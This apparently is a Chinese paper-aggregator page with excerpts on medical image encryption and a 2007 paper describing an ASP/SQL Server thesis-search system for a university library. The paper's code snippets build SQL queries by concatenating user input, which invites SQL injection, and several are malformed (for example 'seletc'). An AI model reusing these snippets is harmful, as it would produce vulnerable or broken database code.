论文提要单一品牌已越来越难以满足消费者的需求,实施多品牌策略成为众多企业竞争市场的手段。本文分析多品牌策略的概念、优点和缺点、使用范围、实践应用,希望对企业的品牌决策提供帮助。

主要参考文献:

篇(9)

基本思想是通过混沌系统运算出一个混沌序列,将这个序列按照事先选取的既定的算法或是排列方案进而进一步进行运算以生成新的一个序列。与此同时,为了保证原混沌序列的位置与计算后的新序列之间的变换位置是一一对应的,又进一步利用了混沌系统的遍历性。实验表明,这种通过由混沌系统得出的混沌序列的进而对其进一步运算得到的变化关系在应用到图像置乱后可以实现明显的图像置乱效果。同时为了改变加密图像的统计特性、图像像素值以及降低图像像素值间的相关性,也可以通过单个混沌序列或多个复合的混沌序列来实现改变。数字图像信息隐藏数字图像信息隐藏技术也可用于保护病人医学影像的隐私。基本思想是,将需要被加密的医学图像的数字信息隐藏在另外一幅无关的图像中,比如一幅公开图像。这幅图像要求具有一定的迷惑性、大众性,以便迷惑攻击者,能够降低转移其注意力,这样就降低了图像被攻击的几率;与此同时,通过一定算法改变加密图像的原有的统计特性。以达到保护被加密影像的目的。应用其中的调配融合算法、“中国拼图”算法可以使图像的信息隐藏达到一个高质量的水平。另外,还可以综合各种不同的算法的特点,将数字隐藏技术扩展到声音、图像等不同的信息载体中的信息隐藏需求中去。另外,近年来新兴的一种数字作品版权保护技术——数字图像水印技术[3],能够有效地保护作者以及出版商的合法权益不受侵犯,现已被广泛应用于印刷领域中,具有了广阔的使用价值和商用价值,成为多媒体及知识产权保护的有效手段之一。数字图像水印技术是信息隐藏技术研究领域的一个重要分支。为了显示创作者对其作品的所有权,这种隐藏技术将具有某种意义的数字水印利用数字嵌入方法将其隐藏在其作品(可以是多种信息载体,比如视频、图像、声音、文字等数字产品)中。在进行印刷品真伪验证时,可通过水印的检测、分析来保证数字信息的完整性及可靠性。数字图像分存数字图像分存技术是把一幅需要进行保护的数字图像分割成多幅图像进行传输。被分割后的图像不再具有某种特殊的意义成为无意义或是看起来杂乱无章的图像。也可将分割后图像进一步隐藏到另外几幅不相关的或是具有一定迷惑作用的图像中进行存储获传输。这类似于数据组的分包传输。这样可以避免因个别图像的传输丢失而造成病人隐私信息遭到泄露的危险,而且也起到在通信中个别被分割后的图像信息的丢失与泄露不会影响原始图像信息的泄露。数字图像分存技术的特点使窃密者窃取完整的原始图像的成本大大增加,而且也提高了病人图像隐私的保密程度同时,若将图像置乱技术、图像隐藏技术、图像分存技术三者结合起来将使图像的安全传输有了较高的可靠性。

对病人实行连续诊断,及时获取病情发展状况成为未来要实现的目标;同时,病人的隐私在图像传输过程中也增加了泄露和被攻击的风险,因此,在某种特定情况下对病人图像信息的传输需要进行加密保护。实现这一目标的关键技术就是安全性高、保密性强、延时短的图像加密通信系统。图像加密通信系统对病人的病情进行实时监护,并将病人的信息实时传回到医生的监控中心,使医生能够通过监控屏幕实时查看了解病人的具体情况,以能够及时做出正确的医疗诊断。目前数字图像的特点决定了其在存储传输时必定要占用较大的空间与带宽,再加上其需要处理的信息量大,这就进一步给图像的加密和通信带来了困难。而远程医疗更需要清楚的观测到病人的详细病情,就进一步加大了保密通信的难度。因此需要将图像压缩以及图像加密两个技术结合起来对数字图像的传输进行处理。图像加密是为了保证数字图像的安全,图像的压缩技术可以最大限度的减小占用的存储空间以便降低传输数据量。根据对原始图像进行压缩及加密处理过程不同,可将现有的数字图像加密通信分为三类。图像直接加密将数字图像直接加密一般是通过数字图像置乱技术直接对需要加密的数字图像进行置乱,随后再进行压缩编码和通信传输。这个方面的研究较早,相关论文也最多。例如,基于混沌的数据块加密算法将图像或视频数据先进行位置置乱,再进行像素值扩散,此算法具有较高的密钥敏感性和明文敏感性,使得加密后的数据具有均匀随机分布的特点。但是,这类方案只看重了图像的加密,没有将图像的压缩编码问题放在同样重要的位置上考虑。这样就随之而然的出现了两个严重影响通信效率及解密后的图像清晰度的问题。一是,需要加密的原始视频图像本身的数据占用空间就大,其进一步的加密计算便会消耗大量的资源与时间,这与实时性的要求有悖,况且目前的设备处理能力有限更难以达到图像传输的实时性要求,加重了通信的负担;二是,由于经过加密算法处理,使图像原来的相邻像素间的相关性有了变化,大量的增加了高频分量。使加密压缩后的视频图像的高频分量比低频分量的失真大得多,因此解密后的图像会有较大的失真。

首先通过现有的压缩算法对视频、图像进行压缩,之后再对压缩后的数据加密。加密的算法可更具需要采用安全性不同的算法。此方案的优点是具有较高的安全性;缺点是由于加密是在压缩后的数字图像数据上进行,便不再区分数据的重要性,因此数据加密的效果差、效率低而且数据也量大,使运算的设备负担也加重。选择性加选择性加密是在方案特点的基础上改进,在选择采用一定的压缩标准将视频图像压缩后,再对重要的数据进行着重加密。兼顾了数据的安全与传输的效率。目前,视频图像编码标准根据静态图像和动态图像来分主要分为静态图像的压缩标准和运动图像的压缩标准两种。动态图像的压缩标准主要有MPEG-1,MPEG-2,MPEG-4,H.263和H.264;静态图像的压缩标准主要有JPEG、JPEG2000。文献[4]采用小波置乱的方法来实现对JPEG2000的小波系数的实时加密。针对MPEG-2标准,文献[5]提出了对I帧加密的思路。针对H.264具有代表性的研究成果有Ahn提出的帧内预测模式加扰方法,该方法将所有I、P帧中的INTRA-4x4块和INTR_16×16块预测模式使用定长伪随机序列进行随机加扰,方法效率高但安全性较差。文献[6]提出了对熵编码过程进行加密的思路,但这种方案的实现比较复杂。

作者:李颖姝 李莹 单位:青岛市第五人民医院 青岛市电子政务与信息资源管理办公室

篇(10)

中图分类号:TP392:J642.477文献标识码:A 文章编号:1009-3044(2007)17-31327-02

Design and Implementation of Thesis Searching System Based on B/S structure

LIU Qun-Yan,ZHANG Da-Wei

(Library Xi'an Polytechnic University ,Xi'an 710048,China)

Abstract:Based on the B/S structure, a thesis searching system is designed and developed for academic thesis searching by the ASP technique and SQL database. The system can run very stably, has complete functions and satisfies all requirements of thesis search excellently, which provides a good platform for sufficient using of academic thesis.

Key words:thesis search; ASP technology; SQL SERVER; B/S structure

1 前言

学位论文是高等院校或科研机构的学生为获得某一级别的学位而向学校或其它学术单位提交的学术研究论文,是围绕某一学科的重点或前沿课题进行的创造性研究和探讨并加以总结的产物,所以它是具有较高学术价值的科技文献。但很多高校多年来的博士和硕士论文因查询不便而不能为教学和科研充分利用,所以建立基于网络的、不受时间和空间约束的论文检索系统已成为提高高校学位论文利用率的关键。而购买商业公司开发的检索系统虽然其功能齐全、性能稳定,但不仅代价昂贵,而且其过于广泛,不适合某一高校的学科特点和该校图书馆的具体情况。所以开发高校学位论文检索系统非常必要,而且具有实际应用意义。本文讨论了该系统的开发过程和核心难点技术。

2 系统技术分析及开发环境

本系统采用三层B/S体系结构为其基本框架,运用当前应用广泛的动态web技术ASP实现其与数据库的强大操作和远程客户端的交流。下面对这些技术和开发环境进行分析介绍。

2.1 B/S结构

B/S(Browser/Server)结构即浏览器/服务器结构,是把web 技术和数据库技术结合起来的技术,其实现了开发环境和应用环境的分离,即用户端利用相对统一的浏览器( IE、Netscape 等) 代替客户端软件,实现跨平台的应用服务,B/S通常采用三层分布式体系结构,如图1所示。

图1 B/S结构

三层B/S结构的工作方式主要是用户通过浏览器表单形式把客户请求以HTTP 协议方式发送到web服务器,web服务器向数据库服务器发送数据请求,数据库服务器经过数据处理后将符合条件的数据返回到web服务器,web服务器把结果翻译成HTML模式或各类Script 格式, 返回浏览器供用户阅读。

本系统采用三层B/S体系结构,用户只要能连接到Internet网络,就能很方便的在任何时间任何地点查询学位论文。

2.2 ASP技术

ASP(Active Server Page) 是Microsoft 提出的基于服务器端的脚本执行环境,通过在普通HTML页面中嵌入的ASP脚本语言(VBScript 、Jscript),就可以建立和执行动态的、交互的、高性能的Web应用程序。由于ASP脚本是在服务器端解释执行的,所以用其设计的程序独立于客户端浏览器且保密性较高;ASP采用ADO技术访问数据库,ADO是一组优化的访问数据库专用对象集,提供了完整的站点数据库访问方案,使ASP访问数据库十分方便。基于以上原因,本系统采用ASP技术来实现其功能。

2.3 系统开发平台和环境

本系统服务器端采用高性能、高可靠性和高安全性的Microsoft Windows 2003 Server为其操作系统,并配置IIS6.0;选取可扩充的、高效的关系型数据库管理系统SQL SERVER 2000为后台数据库;采用专业网站开发编辑器Macromedia Dreamweaver MX 2004为系统开发工具;开发语言为HTML和VBScript;客户端只需要安装 IE4.0 或Netscape3.0 以上版本的浏览器即可使用本系统。

3 系统的总体结构设计

在开发此系统之前,作者做了大量的需求分析,充分了解掌握了系统所必需具有的功能,并考虑了人机功效方面的问题进行系统设计。下面对该系统的功能模块、web页面、数据库作总体的设计。

3.1 功能模块分析与设计

根据用户对论文检索精度要求的不同,该系统主要分为两大模块,(1)基本检索模块,(2)高级检索模块,如图2所示。

图2 系统工作流程图

基本检索模块:主要适用于对检索精确度要求不高、对论文库按某一条件字段进行简单分类检索的用户。该模块的功能要求主要有:用户选择某一检索项并输入检索词,就可检索到符合该条件的所有记录,并将检索结果分页显示;可以浏览某一纪录的详细内容,包括摘要。

高级检索模块:该模块适用于对检索结果要求精确、多条件查询的用户。该模块的功能要求主要有:可以实现多个条件的与、或、非复杂查询;将检索结果分页显示;可浏览某一纪录的详细信息,包括摘要。

根据学位论文的特点和用户的检索需求,其检索选择项分为七类:论文题名、论文作者、论文导师、关键词、学科专业,中文摘要、分类号。

3.2 Web页面设计

根据该系统的模块及功能,实现该系统需要4个页面。检索首页index.asp,该页面采用HTML表单的形式收集用户输入的检索词及检索选择项条件;基本检索Bsearch.asp,该页实现基本检索的功能页面,并将查询结果分页显示;高级检索Hsearch.asp,该页实现高级检索多选项、多条件的与、或、非查询功能,并将查询结果分页显示;记录详细显示Show.asp, 该页实现浏览某一纪录的详细信息,本校用户可查看全文。其页面间的关系如图3所示。

图3 页面关系图

3.3 后台数据库设计

本系统采用SQL SEVER 2000来创建后台数据库。为了提高数据库服务器的响应速度并确保数据安全,本系统采用文件实体和文件参数分别存放的方法,即在数据库中只保存论文的文件名、存放路径、文件格式和大小,而在WEB服务器指定目录存放学位论文全文。根据学位论文的构成特点和用户的查询需求,创建的数据库表的字段如下:姓名、学号、专业、培养单位、论文题名、分类号、学位级别、导师姓名、导师单位、提交日期、关键词、论文页数、中文摘要、英文摘要、全文文件名,全文路径、全文大小、全文格式。

4 系统功能实现及核心技术

在本系统的开发过程中,主要解决了三个核心技术问题。ASP与WEB数据库的连接、多条件的与、或、非复杂查询问题和查询结果分页显示问题。下面来阐述这些问题的解决方法。

4.1 ASP与WEB数据库的连接

ASP与数据库的连接一般有三种方法:(1)通过ODBC DSN建立连接,(2)通过OLE DB建立连接,(3)通过Driver建立连接,本系统选用通过Driver建立连接的方法,使用该方法,程序的可移植性比较好。系统建立连接的过程如下:(1)建立数据库连接对象:set conn = server.createobject ("adodb. connection ");(2)打开要访问的数据库:conn.open"Driver;Server=;Database=;Uid=;Pwd= "(3)建立记录集对象:set rs= server. createobject("ADODB.recordset");(4)打开记录集对象:rs. open strsql,conn,"3","1";(5)利用记录集对象所提供的属性对Web 数据库实施操作;(6)关闭记录集对象:rs.close;(7)关闭数据连接对象:conn.close;

4.2 检索功能实现

本系统两大检索模块中,基本检索模块中的SQL查询比较简单,在这里不予熬述。重点来阐述高级检索模块中的动态多选项、多条件的与、或、非查询,这是开发本系统的核心技术和难点之一。本文采用VBScript中的select case语句来识别用户的动态检索项,用IF语句来控制多条件的查询,专门设置变量strhigh2接受用户所选取的与、或、非条件。SQL查询语句用变量strsql来保存,而最初的查询语句是:strsql= "select * from table1 where 1=1 ",后面依据条件对查询语句进行叠加,如:strsql=strsql& "select * from table1 where name = "liuyan" ",直到条件判断完毕,最后形成SQL查询语句,并保存在strsql变量中,执行rs.open strsql,conn,"3","1"语句。系统查询功能实现。

为了提高系统的简单易用性和查询结果的命中精度,本系统支持作者姓名、导师姓名字段的精确查询,而对字段论文题名、关键词、论文摘要、提交年份、学科专业、分类号实施模糊查询,如:用SQL语句seletc * from table1 where name like %"& yan & "%实现模糊查询。

4.3 查询结果分页显示

在显示查询结果时,如果所有检索的命中记录在一页显示,将不方便用户浏览,所以系统要求将查询结果分页显示。而实现查询结果分页显示关键要解决两方面的问题:(1)循环显示本页记录,(2)翻页控制。

循环显示本页记录:即当前页记录的显示问题。本系统采用双重嵌套的Do WhileLoop语句来控制当前页记录的显示,用 rs.("字段名")显示记录字段;采用ADO中数据集RecordSet对象的一些属性来进行参数设置:用PageSize属性设置每页显示的记录数;用PageCount 、RecordCount属性分别显示检索命中的总记录数和页数;用AbsolutePage属性表示当前页码;用MoveNext方法来移动记录指针;并用到了BOF 属性和EOF 属性。通过运用以上的语句控制与属性设置,实现了当前页记录的显示。

(2)翻页控制:系统要求将查询结果分多页显示,而在进行翻页时,涉及到对页面bsearch.asp或hsearch.asp(实现检索和分页显示的功能页)的自身连接,也就是web服务器端要重新执行该页面程序,重新接收用户输入的检索词和重新执行SQL查询语句,并且要求正确显示目标页记录。所以,在系统进行翻页时,要对两类参数进行传递,分别是用户输入的检索词、检索项和当前页数。本系统采用表单的隐藏域来对这两类参数进行传递,选取Request.form("")来接收用户从表单输入的检索词和检索项,而采用Request.querystring("")来接收翻页时由表单隐藏域传递的检索词、检索项参数和当前页数参数,并用IF语句来判断使用前者还是后者;翻页的自身连接采用URL方式传递目标页数。参数传递正确,系统成功实现翻页功能。

5 结束语

采用web技术、数据库技术、ASP技术实现了基于B/S结构的高校学位论文检索系统。在此系统开发过程中,重点研究解决了动态多选项、多条件的与、或、非复杂查询问题,以及检索结果分页显示的问题。经过测试,本系统性能稳定、界面友好、易于使用,现已应用于西安工程大学图书馆,解决了高校学位论文的检索难题,使得博士、硕士论文能够被科研和教学充分利用,提高了学问论文的利用率,这也是开发本系统的真正意义所在,作者感到欣慰!

参考文献:

[1]陈健伟,李美军,施建强,等. ASP动态网站开发教程[M].北京:清华大学出版社,2005.188-206.

[2]张固,汪晓平.ASP网络应用系统典型模块开发实例解析[M].北京:人民邮电出版社,2005.53-95.

[3]龙马工作室.ASP+SQL Server组建动态网站实例精讲[M]. 北京:人民邮电出版社,2005.73-96.

上一篇: 高中课题组员自我总结 下一篇: 情侣检讨书
相关精选
相关期刊